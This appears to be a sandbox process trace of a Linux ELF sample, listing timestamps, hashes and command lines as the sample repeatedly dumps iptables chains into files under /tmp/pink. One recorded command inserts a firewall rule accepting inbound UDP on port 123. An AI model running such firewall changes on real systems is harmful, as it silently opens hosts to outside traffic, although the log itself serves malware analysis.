    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

    Start time (UTC):12:05:23
    Start date (UTC):10/01/2025
    Path:/sbin/iptables
    Arguments:/sbin/iptables -n -L OUTPUT
    File size:99296 bytes
    MD5 hash:1ab05fef765b6342cdfadaa5275b33af

    Start time (UTC):12:05:39
    Start date (UTC):10/01/2025
    Path:/tmp/file.elf
    Arguments:-
    File size:5777432 bytes
    MD5 hash:0083f1f0e77be34ad27f849842bbb00c

    Start time (UTC):12:05:39
    Start date (UTC):10/01/2025
    Path:/bin/sh
    Arguments:/bin/sh -c "/sbin/iptables -n -L OUTPUT > /tmp/pink/protect_ipt_check"
    File size:129816 bytes
    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

    Start time (UTC):12:05:39
    Start date (UTC):10/01/2025
    Path:/bin/sh
    Arguments:-
    File size:129816 bytes
    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

    Start time (UTC):12:05:39
    Start date (UTC):10/01/2025
    Path:/sbin/iptables
    Arguments:/sbin/iptables -n -L OUTPUT
    File size:99296 bytes
    MD5 hash:1ab05fef765b6342cdfadaa5275b33af

    Start time (UTC):12:05:55
    Start date (UTC):10/01/2025
    Path:/tmp/file.elf
    Arguments:-
    File size:5777432 bytes
    MD5 hash:0083f1f0e77be34ad27f849842bbb00c

    Start time (UTC):12:05:55
    Start date (UTC):10/01/2025
    Path:/bin/sh
    Arguments:/bin/sh -c "/sbin/iptables -n -L OUTPUT > /tmp/pink/protect_ipt_check"
    File size:129816 bytes
    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

    Start time (UTC):12:05:55
    Start date (UTC):10/01/2025
    Path:/bin/sh
    Arguments:-
    File size:129816 bytes
    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

    Start time (UTC):12:05:55
    Start date (UTC):10/01/2025
    Path:/sbin/iptables
    Arguments:/sbin/iptables -n -L OUTPUT
    File size:99296 bytes
    MD5 hash:1ab05fef765b6342cdfadaa5275b33af

    Start time (UTC):12:06:11
    Start date (UTC):10/01/2025
    Path:/tmp/file.elf
    Arguments:-
    File size:5777432 bytes
    MD5 hash:0083f1f0e77be34ad27f849842bbb00c

    Start time (UTC):12:06:11
    Start date (UTC):10/01/2025
    Path:/bin/sh
    Arguments:/bin/sh -c "/sbin/iptables -n -L OUTPUT > /tmp/pink/protect_ipt_check"
    File size:129816 bytes
    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

    Start time (UTC):12:06:11
    Start date (UTC):10/01/2025
    Path:/bin/sh
    Arguments:-
    File size:129816 bytes
    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

    Start time (UTC):12:06:11
    Start date (UTC):10/01/2025
    Path:/sbin/iptables
    Arguments:/sbin/iptables -n -L OUTPUT
    File size:99296 bytes
    MD5 hash:1ab05fef765b6342cdfadaa5275b33af

    Start time (UTC):12:06:27
    Start date (UTC):10/01/2025
    Path:/tmp/file.elf
    Arguments:-
    File size:5777432 bytes
    MD5 hash:0083f1f0e77be34ad27f849842bbb00c

    Start time (UTC):12:06:27
    Start date (UTC):10/01/2025
    Path:/bin/sh
    Arguments:/bin/sh -c "/sbin/iptables -n -L OUTPUT > /tmp/pink/protect_ipt_check"
    File size:129816 bytes
    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

    Start time (UTC):12:06:27
    Start date (UTC):10/01/2025
    Path:/bin/sh
    Arguments:-
    File size:129816 bytes
    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

    Start time (UTC):12:06:27
    Start date (UTC):10/01/2025
    Path:/sbin/iptables
    Arguments:/sbin/iptables -n -L OUTPUT
    File size:99296 bytes
    MD5 hash:1ab05fef765b6342cdfadaa5275b33af

    Start time (UTC):12:06:43
    Start date (UTC):10/01/2025
    Path:/tmp/file.elf
    Arguments:-
    File size:5777432 bytes
    MD5 hash:0083f1f0e77be34ad27f849842bbb00c

    Start time (UTC):12:06:43
    Start date (UTC):10/01/2025
    Path:/bin/sh
    Arguments:/bin/sh -c "/sbin/iptables -n -L OUTPUT > /tmp/pink/protect_ipt_check"
    File size:129816 bytes
    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

    Start time (UTC):12:06:43
    Start date (UTC):10/01/2025
    Path:/bin/sh
    Arguments:-
    File size:129816 bytes
    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

    Start time (UTC):12:06:43
    Start date (UTC):10/01/2025
    Path:/sbin/iptables
    Arguments:/sbin/iptables -n -L OUTPUT
    File size:99296 bytes
    MD5 hash:1ab05fef765b6342cdfadaa5275b33af

    Start time (UTC):12:04:51
    Start date (UTC):10/01/2025
    Path:/tmp/file.elf
    Arguments:-
    File size:5777432 bytes
    MD5 hash:0083f1f0e77be34ad27f849842bbb00c

    Start time (UTC):12:05:51
    Start date (UTC):10/01/2025
    Path:/tmp/file.elf
    Arguments:-
    File size:5777432 bytes
    MD5 hash:0083f1f0e77be34ad27f849842bbb00c

    Start time (UTC):12:05:51
    Start date (UTC):10/01/2025
    Path:/tmp/file.elf
    Arguments:-
    File size:5777432 bytes
    MD5 hash:0083f1f0e77be34ad27f849842bbb00c

    Start time (UTC):12:05:51
    Start date (UTC):10/01/2025
    Path:/bin/sh
    Arguments:/bin/sh -c "/sbin/iptables -n -L INPUT > /tmp/pink/p2p_ipt_check"
    File size:129816 bytes
    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

    Start time (UTC):12:05:51
    Start date (UTC):10/01/2025
    Path:/bin/sh
    Arguments:-
    File size:129816 bytes
    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

    Start time (UTC):12:05:51
    Start date (UTC):10/01/2025
    Path:/sbin/iptables
    Arguments:/sbin/iptables -n -L INPUT
    File size:99296 bytes
    MD5 hash:1ab05fef765b6342cdfadaa5275b33af

    Start time (UTC):12:05:51
    Start date (UTC):10/01/2025
    Path:/tmp/file.elf
    Arguments:-
    File size:5777432 bytes
    MD5 hash:0083f1f0e77be34ad27f849842bbb00c

    Start time (UTC):12:05:51
    Start date (UTC):10/01/2025
    Path:/bin/sh
    Arguments:/bin/sh -c "/sbin/iptables -I INPUT -p udp --dport 123 -j ACCEPT"
    File size:129816 bytes
    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

    Start time (UTC):12:05:51
    Start date (UTC):10/01/2025
    Path:/bin/sh
    Arguments:-
    File size:129816 bytes
    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

    Start time (UTC):12:05:51
    Start date (UTC):10/01/2025
    Path:/sbin/iptables
    Arguments:/sbin/iptables -I INPUT -p udp --dport 123 -j ACCEPT
    File size:99296 bytes
    MD5 hash:1ab05fef765b6342cdfadaa5275b33af

    Start time (UTC):12:06:51
    Start date (UTC):10/01/2025
    Path:/tmp/file.elf
    Arguments:-
    File size:5777432 bytes
    MD5 hash:0083f1f0e77be34ad27f849842bbb00c

    Start time (UTC):12:06:51
    Start date (UTC):10/01/2025
    Path:/tmp/file.elf
    Arguments:-
    File size:5777432 bytes
    MD5 hash:0083f1f0e77be34ad27f849842bbb00c

    Start time (UTC):12:06:51
    Start date (UTC):10/01/2025
    Path:/bin/sh
    Arguments:/bin/sh -c "/sbin/iptables -n -L INPUT > /tmp/pink/p2p_ipt_check"
    File size:129816 bytes
    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

    Start time (UTC):12:06:51
    Start date (UTC):10/01/2025
    Path:/bin/sh
    Arguments:-
    File size:129816 bytes
    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

    Start time (UTC):12:06:51
    Start date (UTC):10/01/2025
    Path:/sbin/iptables
    Arguments:/sbin/iptables -n -L INPUT
    File size:99296 bytes
    MD5 hash:1ab05fef765b6342cdfadaa5275b33af

    Start time (UTC):12:04:51
    Start date (UTC):10/01/2025
    Path:/tmp/file.elf
    Arguments:-
    File size:5777432 bytes
    MD5 hash:0083f1f0e77be34ad27f849842bbb00c